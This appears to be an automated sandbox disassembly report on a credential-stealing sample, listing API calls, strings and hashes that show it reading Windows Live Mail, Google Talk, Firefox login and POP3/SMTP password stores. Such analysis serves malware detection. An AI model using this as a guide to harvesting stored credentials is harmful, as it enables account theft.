                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                    • memset.MSVCRT ref: 00444379
                                                                    • memset.MSVCRT ref: 00444394
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                    • strlen.MSVCRT ref: 004443DB
                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                    Strings
                                                                    • Store Root, xrefs: 004443A5
                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                    • API String ID: 3203569119-2578778931

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                    • String ID:
                                                                    • API String ID: 2054149589-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor_mbsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 882979914-1578091866

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 004109F7
                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                    • memset.MSVCRT ref: 00410A32
                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                    • String ID:
                                                                    • API String ID: 3143880245-0

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                    • memset.MSVCRT ref: 00410E10
                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 119022999-2036018995
                                                                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                    Control-flow Graph (basic-block ranges and edges as exported by the plugin; the executed/not-executed colouring of the rendered graph is not recoverable from text)
                                                                    control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                    APIs
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                    • memset.MSVCRT ref: 00408620
                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                    • memset.MSVCRT ref: 00408671
                                                                    Strings
                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                    • API String ID: 3996936265-1079885057
                                                                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                    Control-flow Graph (basic-block ranges and edges as exported by the plugin; the executed/not-executed colouring of the rendered graph is not recoverable from text)
                                                                    control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                    APIs
                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$_strcmpimemset
                                                                    • String ID: /stext
                                                                    • API String ID: 520177685-3817206916
                                                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                    APIs
                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID:
                                                                    • API String ID: 145871493-0
                                                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                    APIs
                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                    • String ID:
                                                                    • API String ID: 4165544737-0
                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                    APIs
                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                    APIs
                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind
                                                                    • String ID:
                                                                    • API String ID: 1863332320-0
                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                    • API String ID: 2238633743-192783356
                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                    • API String ID: 3963849919-1658304561
                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID: (yE$(yE$(yE
                                                                    • API String ID: 1865533344-362086290
                                                                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                    • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                    • memset.MSVCRT ref: 0040EC47
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                    • API String ID: 3137614212-1455797042
                                                                    • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                    • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                    APIs
                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                    • memset.MSVCRT ref: 0040E736
                                                                    • memset.MSVCRT ref: 0040E74F
                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                    • memset.MSVCRT ref: 0040E858
                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                    • API String ID: 4171719235-3943159138
                                                                    • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                    • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                    • GetDC.USER32 ref: 004104E2
                                                                    • strlen.MSVCRT ref: 00410522
                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                    • sprintf.MSVCRT ref: 00410640
                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                    Strings
                                                                    Memory Dump Source
